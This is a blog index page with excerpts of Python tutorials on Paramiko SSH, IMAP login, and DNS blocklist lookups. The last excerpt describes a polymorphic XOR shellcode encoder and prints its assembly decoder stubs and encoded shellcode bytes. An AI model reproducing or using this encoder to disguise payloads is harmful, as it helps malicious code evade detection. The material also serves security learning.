SSH Fingerprint and Hostkey with Paramiko in Python

Following on from SSH and SFTP with Paramiko & Python, I recently had the need to gain a remote SSH server’s fingerprint and hostkey for verification purposes. This is achievable through setting up a socket, and then applying paramiko.Transport over our established socket. First, we include the various bits and pieces we’ll need: import socket import paramiko import hashlib import base64 Next, we establish a socket connection ‘mySocket’ to “localhost” on port 22 – our dummy SSH server. We then use paramiko.Transport to gain access to paramiko’s core SSH protocol options on the socket. mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) mySocket.connect(("localhost", 22)) myTransport = paramiko.Transport(mySocket) myTransport.start_client() To get the remote hostkey, we call myTransport.get_remote_server_key(): […]

By | November 24th, 2014|Python|0 Comments

SSH and SFTP with Paramiko & Python

Paramiko is a Python implementation of SSH with a whole range of supported features. To start, let’s look at the most simple example – connecting to a remote SSH server and gathering the output of ls /tmp/ import paramiko ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(‘localhost’, username=’testuser’, password=’t3st@#test123′) except paramiko.SSHException: print "Connection Failed" quit() stdin,stdout,stderr = ssh.exec_command("ls /etc/") for line in stdout.readlines(): print line.strip() ssh.close() After importing paramiko, we create a new variable ‘ssh’ to hold our SSHClient. ssh.set_missing_host_key_policy automatically adds our server’s host key without prompting. For security, this is not a good idea in production, and host keys should be added manually. Should a host key change unexpectedly, it could indicate that the connection has been compromised and is being diverted elsewhere. Next, we create 3 variables, stdin, stdout and stderr allowing us to access the respective streams when calling ls /etc/ Finally, for each “\n” terminated line on stdout, we print the line, stripping the trailing “\n” (as print adds one). Finally we close the SSH connection. Let’s look at another example, where we communicate with stdin. […]

By | November 23rd, 2014|Python|6 Comments

Simple IMAP Account Verification in Python

imaplib is a great library for handling IMAP communication. It supports both plaintext IMAP and IMAP over SSL (IMAPS) with ease. Connecting to an IMAP server is achieved as follows: import imaplib host = "" port = 143 ssl = 0 try: if ssl: imap = imaplib.IMAP4_SSL(host, port) else: imap = imaplib.IMAP4(host, port) welcomeMsg = imap.welcome print "IMAP Banner: %s" %(welcomeMsg) except: print "Connection Failed" quit() This results in the following output: “IMAP Banner: * OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS] Courier-IMAP ready. Copyright 1998-2011 Double Precision, Inc. See COPYING for distribution information.” Now, to log in: username="" password="password" try: loginMsg = imap.login(username, password) print "Login Message: %s" %(loginMsg[1]) except: print "Login Failed" quit() With acceptable credentials, the response is: “Login Message: [‘LOGIN Ok.’]”. Lastly, to print a list of all mailboxes in the account: try: mBoxes = imap.list() for mBox in mBoxes[1]: print mBox except: print "Couldn’t get Mail Boxes" quit() […]

By | November 22nd, 2014|Python|0 Comments

DNS Black List / RBL Checking in Python

Following on from performing basic DNS Lookups in Python, it’s relatively trivial to begin testing DNS Block Lists/Real Time Black Lists for blocked mail server IP addresses. To assist in preventing spam, a number of public and private RBLs are available. These track the IP addresses of mail servers that are known to produce spam, thus allowing recipient mail servers to deny delivery from known spammers. RBLs operate over DNS. In order to test a RBL, a DNS query is made. As an example, is a popular RBL. If I wanted to test IP address against the blocklist, I would reverse the octets in the IP address and then append ‘’, i.e. I then perform an ‘A’ record lookup on said host: root@w:~/tmp# host -t a Host not found: 3(NXDOMAIN) Excellent. IP was not found in NXDOMAIN is returned. Now, to take a known spammer’s IP: […]

By | November 22nd, 2014|Python|2 Comments

Performing DNS Queries in Python

dnspython provides a detailed interface into DNS. In its simplest form, it’s possible to perform queries in only a couple of lines of code. Here’s a commented example: import dns.resolver #import the module myResolver = dns.resolver.Resolver() #create a new instance named ‘myResolver’ myAnswers = myResolver.query("", "A") #Lookup the ‘A’ record(s) for for rdata in myAnswers: #for each response print rdata #print the data The results in my case are: […]

By | November 21st, 2014|Development, Python|3 Comments

Python Cascading XOR Polymorphic Shellcode Generator

I’ve been working on a simple python utility to encode and wrap existing shellcode. The shellcode is XOR’d with a random seed byte each time, and then the shellcode is XOR’d with the previous byte. The stub itself is vaguely polymorphic. The stub itself is very small although on each run, it will reorder instructions where possible, use different registers, and add some random nop sequences. The encoder itself supports shellcode with or without null bytes and also supports a list of ‘bad characters’ that are not allowed to appear in the finished result wherever possible. That part isn’t fool proof, and certain characters such as ‘\xeb’ are unavoidable. This could be improved a lot however. I also know the Python code isn’t great, but it is functional. As you’ll see from looking through the code, I never got round to learning about Python data types and so there’s a lot of hackery and kludgery. In any case, the purpose was just to develop a basic functional PoC from scratch. If the entered shellcode contains nulls, we’ll use a slightly different version of the decoder stub. If we DO have nulls, our basic stub is: _start: jmp short getpc start_decoder: pop edi decoder: inc edi mov bl, [edi] xor [edi-1], bl cmp byte[edi+1], 0xXX jnz decoder jmp short shellcode getpc: call start_decoder shellcode: db 0xf0,0x19,0x0c,0x0c,0x0c,0x0c,0x55,0x64,0xa4,0x95,0x4e,0x7f,0xad,0x1d,0x19,0xaa,0xab,0x19,0x14,0xd9,0x59,0xe9,0xe8,0x5b,0x5a,0x97,0x17,0xff,0x19,0xe6,0x19,0xe6,0xae,0xcb,0xa7,0xcb,0xa4,0x84,0xd3,0xbc,0xce,0xa2,0xc6,0xe7,0xed,0xXX, There will be various transforms made to this code, however the main point to note is that we ‘cmp’ the byte with our random stop bit (0xXX) and you’ll see that tagged on to the end of the shellcode also. If we have no nulls, then \x00 is going to be our definer for the last character, and so we can shorten the shellcode slightly: global _start section prog write exec _start: jmp short getpc start_decoder: pop ebp decoder: mov dl, [ebp+1] inc ebp xor [ebp-1], dl jne decoder jmp short shellcode getpc: call start_decoder shellcode: db 0x64,0x55,0x8e,0x79,0x9a,0x2a,0x4c,0x1f,0xe1,0x22,0x71,0x1b,0x19,0x90,0x71,0xbc,0x3c,0xb5,0x72,0x18,0x7e,0x26,0x7d,0x23,0x45,0x2d,0x20,0xd0,0xb6,0xe5,0x6c,0x8d,0xe7,0xf7,0xa6,0xf1,0x78,0x99,0x54,0xd4,0xbe,0xd8,0x80,0x81,0x5a,0x30,0x31,0x66,0xef,0x0e,0xc3,0x43,0x29,0x4f,0x17,0x54,0x65,0xb7,0xe5,0xb7,0xe0,0x69,0x88,0x45,0xc5,0x56,0x67,0xae,0x1f,0x1d,0xad,0x92,0x5f,0xdf,0x96,0xef,0x16,0x27,0xe7,0xb7,0xdf,0xf0,0xdf,0xac,0xc4,0xac,0x83,0xe1,0x88,0xe6,0x6f,0x8c,0xdc,0x55,0xb7,0xe4,0x6d,0x8c,0x3c,0x37,0xfa,0x7a,0x7a, In this case, we have the stop bit twice – 0x7a,0x7a which will xor to 0x00 allowing our ‘jne decoder’ to evaluate to false and continue into the shellcode. The nop generator function is commented out however this can be expanded as needed to pad out the shellcode. Here’s the full encoder: […]

By | April 11th, 2013|Linux, Python, Shellcode|0 Comments